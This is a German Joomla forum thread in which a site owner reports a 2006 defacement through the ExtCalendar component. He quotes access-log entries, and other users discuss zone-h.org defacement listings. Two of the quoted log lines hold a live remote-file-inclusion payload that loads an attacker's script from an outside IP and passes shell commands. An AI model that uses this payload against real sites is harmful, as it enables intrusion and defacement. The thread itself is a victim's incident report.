Thema: Joomla 1.0.10 gehackt

Habe durch die diversen THreats gelesen und schreibe sicher nix neues. Ich nahme an, das meine configuration.php mit den falschen Rechten ausgestattet war. Aber ich bin ganz happy, mein Provider bitete automatische Backups und so ist alles auf dem Stand von zwei Tagen vor Doomsday.

Allerdings dürfte vielleicht folgendes von Interesse sein: In den Logfiles habe ich vier Einträge gefunden, die mit dem Hack etwas zu tun haben. Und nein, ich will niemanden mit der "neuen" Erkenntnis belästigen, das Extcalender eine Lücke bietet. Schaut euch diese Einträge mal an:

81.214.177.35 - - [19/Jul/2006:23:59:30 +0200] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System]configuration.php HTTP/1.0" 200 12108 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.meine-site.xx"

und den hier:

81.214.177.35 - - [20/Jul/2006:00:02:46 +0200] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System]index.php HTTP/1.0" 200 12092 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.meine-site.xx"

Mit dem einen hackt er die configuration.php und mit dem anderen die index.php. Er bneutzt dazu ein Script, das auf einem Server mit der (zumindest temporären) IP Adresse 61.1.197.244 liegt. Die Seite kann man aufrufen (aber bitte nur mit aktivem Virenscanner).

Würde das der Joomla Gemeinde vielleicht irgendwie nutzen und uns helfen, solche fehlgeleiteten Menschen zur Einsicht zu bewegen, dass sie etwas falsches tun?

Es gibt noch zwei weitere Einträge, die ich nicht verstehe, vielleicht kann mir ja jemand erklären, wie es verstanden werden muss:

81.214.177.35 - - [20/Jul/2006:00:09:30 +0200] "GET / HTTP/1.1" 200 671 "http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,Thehacker/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 2.8; .NET CLR 1.0.3705; InfoPath.2)" "www.meine-site.xx"

und der hier

81.214.177.35 - - [20/Jul/2006:00:19:56 +0200] "GET / HTTP/1.1" 200 671 "http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,Thehacker" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 2.8; .NET CLR 1.0.3705; InfoPath.2)" "www.meine-site.xx"
^

Vielen Dank für Eure Bemühungen und in der Hoffnung auf eine freundlichere welt auch im Netz....

Martin

Zitat von Big Bopper

Moin,
wenn Du die Seite www.zone-h.org aufrufst, dann kannst Du links unter "Digital Hacks Archive" einige gehackte Seiten ansehen.
BB

Hallo Big Bopper,

habe ich aufgerufen und vermute eigentlich das gleiche. Allerdings hat der Eintrag miener Seite offensichtlich nicht funktioniert, jedenfalls ahbe ich sie nicht dort wiedergefunden.

Zitat von Big Bopper

Ich vermute daher, das sich das Skript automatisch dort anmeldet. D.h. automatisch eine Meldung unter "Attack Notification" generiert. Nur so kommt der "Held" ja auch in die Liste und steigt weiter im Ranking nach oben.
BB

Irgendwie schade sowas....

Aber bezüglich der IP Adresse, auf der offenischtlich ide Hack-Scripte (als txt-dateien) liegen wäre ja mal interessant, wie man damit umgehen kann oder soll...

Martin

Zitat von amarok

nicht das joomla wurde gehackt, sondern extcalendar, darüber sind hier reichlich postings zu finden.

Das stimmt wohl, zumindest wurde Extcal für den Hack missbraucht. Ich hoffe, ich habe nicht den Eindruck erweckt, dass ich da etwas Neuartiges erlebt hätte.

Das einzige, was ich anmerken wollte ist, dass es im Logfile für den Zugriff den Hinweis dazu gibt, welches Script für den Hack verwendet wurde und auf welchem Server dieses Script liegt (habe ich mir auch angesehen - man kann diese txt Datei abrufen).

Wenn das aber im Prinzip auch nicht von Belang ist, dann will ich nicht mit einem weiteren Therad über extcal genervt haben - wie gesagt, meine Absicht war eher eine andere...

Mit den allerbesten Grüßen

Martin